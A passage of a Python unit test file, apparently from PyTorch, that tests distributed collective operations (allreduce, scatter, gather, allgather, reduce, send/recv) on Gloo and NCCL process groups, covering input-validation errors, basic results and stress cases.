with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t3], opts)
def _test_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Single input tests
tests = simple_reduce_tests(self.rank, self.world_size)
for (op, input, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensor = fn(input)
work = pg.allreduce([tensor], opts)
work.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Multi input tests
tests = simple_multi_input_reduce_tests(self.rank, self.world_size)
for (op, inputs, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors, opts)
work.wait()
for tensor in tensors:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Test overloaded convenience function (defaults to using sum)
x = fn(torch.tensor([self.rank + 1.0]))
work = pg.allreduce(x)
work.wait()
self.assertEqual(
torch.tensor([float(self.world_size * (self.world_size + 1) / 2)]), x
)
def test_allreduce_basics(self):
self._test_allreduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allreduce_basics_cuda(self):
self._test_allreduce_basics(lambda t: t.clone().cuda())
def _test_allreduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce(inputs[i]) for i in range(len(inputs))]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allreduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allreduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_allreduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allreduce_stress(inputs)
def test_allreduce_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
t2 = torch.zeros(1, dtype=torch.float64)
t3 = torch.sparse_coo_tensor([[0]], [1], size=(1,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([], opts)
with self.assertRaisesRegex(ValueError, "tensors must all have the same type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout at index"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t3], opts)
with self.assertRaisesRegex(ValueError, "unsupported layout"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t3, t3.clone()], opts)
@skip_if_lt_x_gpu(1)
def test_allreduce_coalesced_checks_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "unsupported device type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1.cuda(), t1.cuda()], opts)
def _test_allreduce_coalesced_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
test_cases = simple_coalesced_reduce_tests(self.rank, self.world_size)
for op, inputs, outputs in test_cases:
opts = c10d.AllreduceCoalescedOptions()
opts.reduceOp = op
tensors = [fn(x) for x in inputs]
work = pg.allreduce_coalesced(tensors, opts)
work.wait()
for result_tensor, expected in zip(tensors, outputs):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(result_tensor, expected)
def test_allreduce_coalesced_basics(self):
self._test_allreduce_coalesced_basics(lambda t: t.clone())
def _test_allreduce_coalesced_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce_coalesced(input) for input in inputs]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
2
* [
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
)
],
inputs[i],
msg="Mismatch in interation {}".format(i),
)
def test_allreduce_coalesced_stress(self):
inputs = [2 * [torch.tensor([i + self.rank])] for i in range(1000)]
self._test_allreduce_coalesced_stress(inputs)
def test_sparse_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1])
t2 = torch.sparse_coo_tensor([[0]], [1], size=(2,))
t3 = torch.sparse_coo_tensor([[0]], [1], size=(4,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.AllreduceOptions()
pg.allreduce([t2, t3], opts)
# Sparse allreduce only works with c10d.ReduceOp.SUM.
for op in [c10d.ReduceOp.PRODUCT, c10d.ReduceOp.MIN, c10d.ReduceOp.MAX]:
with self.assertRaisesRegex(ValueError, "unsupported reduction operation"):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
pg.allreduce([t3], opts)
def _test_sparse_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for num_inputs_per_rank in [1, 2]:
tests = simple_sparse_reduce_tests(
self.rank, self.world_size, num_inputs=num_inputs_per_rank
)
for (inputs, outputs) in tests:
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors)
work.wait()
self.assertEqual(tensors, outputs)
self.assertEqual(work.result(), outputs)
def test_sparse_allreduce_basics(self):
self._test_sparse_allreduce_basics(lambda t: t)
@skip_if_lt_x_gpu(2)
def test_sparse_allreduce_basics_cuda(self):
self._test_sparse_allreduce_basics(lambda t: t.clone().cuda())
def test_scatter_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = -1
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = self.world_size
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([t1, t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * self.world_size, [t1] * self.world_size], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect input list size {}. Input list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t2] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t3] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "requires empty input on non-root"):
opts = c10d.ScatterOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.scatter([t1], [[t1] * self.world_size], opts)
def _test_scatter_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank])) for _ in range(self.world_size)]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the scatter root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.scatter([outputs[i]], [input], opts))
else:
work.append(pg.scatter([outputs[i]], [], opts))
# Wait for work to complete
for i in range(self.world_size):
work[i].wait()
self.assertEqual(torch.tensor([i]), outputs[i])
def test_scatter_basics(self):
self._test_scatter_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_scatter_basics_cuda(self):
self._test_scatter_basics(lambda t: t.clone().cuda())
def _test_scatter_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
outputs = [
[fn(torch.tensor([-1])) for _ in range(self.world_size)]
for _ in range(len(inputs))
]
work_handles = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = root
if root == self.rank:
work = pg.scatter(
[outputs[i][root]], [[fn(e) for e in inputs[i]]], opts
)
else:
work = pg.scatter([outputs[i][root]], [], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
self.assertEqual(
torch.tensor([iter + root]),
outputs[iter][root],
msg=("Mismatch in iteration %d for rank %d" % (iter, root)),
)
def test_scatter_stress(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone())
@unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/15963")
@skip_if_lt_x_gpu(2)
def test_scatter_stress_cuda(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone().cuda())
def test_gather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = -1
pg.gather([], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = self.world_size
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [t1, t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * self.world_size, [t1] * self.world_size], [t1], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect output list size {}. Output list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t2] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t3] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "requires empty output on non-root"):
opts = c10d.GatherOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.gather([[t1] * self.world_size], [t1], opts)
def _test_gather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank]))]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the gather root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.gather([outputs], input, opts))
else:
work.append(pg.gather([], input, opts))
# Wait for work to complete
expected = [torch.tensor([rank]) for rank in range(self.world_size)]
for i in range(self.world_size):
work[i].wait()
if i == self.rank:
self.assertEqual(expected, outputs)
def test_gather_basics(self):
self._test_gather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_basics_cuda(self):
self._test_gather_basics(lambda t: t.clone().cuda())
def _test_gather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = root
if root == self.rank:
work = pg.gather(outputs[i], [fn(inputs[i])], opts)
else:
work = pg.gather([], [fn(inputs[i])], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
self.assertEqual(
expected_outputs[iter],
outputs[iter],
msg=("Mismatch in iteration %d for root %d" % (iter, root)),
)
def test_gather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "requires non-empty input tensor list"):
pg.allgather([], [])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([], [t1])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([[t1] * self.world_size, [t1] * self.world_size], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size - 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size + 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t2]
)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t3]
)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather([([t1, t2] * (self.world_size))[: self.world_size]], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather([([t1, t3] * (self.world_size))[: self.world_size]], [t1])
def _test_allgather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Run with N input tensor per rank
for n in [1, 2, 3]:
input = [fn(torch.tensor([n * self.rank + i])) for i in range(n)]
output = [
[fn(torch.tensor([-1])) for _ in range(n * self.world_size)]
for _ in range(n)
]
expected_output = [
[torch.tensor([i]) for i in range(n * self.world_size)]
for _ in range(n)
]
work = pg.allgather(output, input)
work.wait()
self.assertEqual(expected_output, output)
def test_allgather_basics(self):
self._test_allgather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_basics_cuda(self):
self._test_allgather_basics(lambda t: t.clone().cuda())
def _test_allgather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
for i in range(len(inputs)):
work = pg.allgather(outputs[i], [fn(inputs[i])])
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
expected_outputs[i],
outputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allgather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
dummy_input = [torch.zeros([1], dtype=torch.float32)]
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size)
]
# One of output tensors does not match input list.
dummy_output_lists[0] = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
ValueError, "invalid size of output tensor at index 0"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# One of output tensors does not match input list.
dummy_output_lists[0] = [torch.zeros([1], dtype=torch.float64)]
with self.assertRaisesRegex(ValueError, "invalid tensor type at index 0"):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output lists have too many elements
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size + 1)
]
with self.assertRaisesRegex(
ValueError, "output lists should be equal to world size"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output is not a list of lists.
dummy_output_lists = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
RuntimeError, "Invalid function argument.*output_tensor_lists"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
def test_reduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.reduce([t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element tensor list"
):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.reduce([t1, t1], opts)
def _test_reduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for (op, input, output) in simple_reduce_tests(self.rank, self.world_size):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.reduceOp = op
opts.rootRank = root
tmp = fn(input)
work = pg.reduce([tmp], opts)
work.wait()
if root == self.rank:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tmp)
def test_reduce_basics(self):
self._test_reduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_reduce_basics_cuda(self):
self._test_reduce_basics(lambda t: t.clone().cuda())
def _test_reduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.rootRank = root
tmp = inputs[i].clone()
outputs.append(tmp)
work = pg.reduce([tmp], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(iter * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
outputs[i],
msg=("Mismatch in iteration %d with root rank %d" % (iter, root)),
)
def test_reduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_reduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_reduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_reduce_stress(inputs)
def test_send_recv_all_to_all(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
inputs = [torch.tensor([self.rank]) for _ in range(self.world_size)]
outputs = [torch.tensor([-1]) for _ in range(self.world_size)]
# Issue sends
send_work = []
for i in range(self.world_size):
if i == self.rank:
continue
send_work.append(pg.send([inputs[i]], i, 0))
# Issue recvs
recv_work = []
for i in range(self.world_size):
if i == self.rank:
continue
recv_work.append(pg.recv([outputs[i]], i, 0))
# Wait for sends to complete
for work in send_work:
work.wait()
self.assertTrue(work.is_completed())
# Wait for recvs to complete
for work in recv_work:
work.wait()
self.assertTrue(work.is_completed())
# Test that every output other than our own contains the respective rank
for i in range(self.world_size):
if i == self.rank:
continue
self.assertEqual(torch.tensor([i]), outputs[i])
def test_barrier_implies_wait(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Kick off allreduce operations
size = (100, 100)
num = 16
tensors = [torch.full(size, float(i)) for i in range(num)]
for tensor in tensors:
# Note: leak the returned work handle
pg.allreduce(tensor)
# Barrier should ensure all previous work has completed
pg.barrier().wait()
for i, tensor in enumerate(tensors):
self.assertEqual(torch.full(size, float(i * self.world_size)), tensor)
@skip_if_win32()
def test_round_robin(self):
num_process_groups = 2
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore(str(i), store), self.rank, self.world_size, self.opts()
)
for i in range(num_process_groups)
]
)
# Run a few collectives so that we have called each process group
for _ in range(num_process_groups + 1):
tensor = torch.full([100, 100], float(self.rank))
pg.broadcast(tensor, root=0).wait()
self.assertEqual(torch.full([100, 100], 0.0), tensor)
@skip_if_win32()
def test_round_robin_create_destroy(self):
store = c10d.FileStore(self.file_name, self.world_size)
def create(num, prefix):
return c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore("%s/%d" % (prefix, i), store),
self.rank,
self.world_size,
self.opts()
)
for i in range(num)
]
)
# Run create/use/destroy twice
for i in range(2):
num_process_groups = 2
pg = create(num=num_process_groups, prefix=i)
for _ in range(3):
tensor = torch.ones([10, 10])
pg.allreduce(tensor).wait()
self.assertEqual(torch.full([10, 10], float(self.world_size)), tensor)
del pg
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus > 0:
raise unittest.SkipTest("GPUs are available, skipping test")
def tearDown(self):
pass
@requires_nccl()
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus < 2:
raise unittest.SkipTest("NCCL test requires 2+ GPUs")
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
def tearDown(self):
pass
@requires_nccl()
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
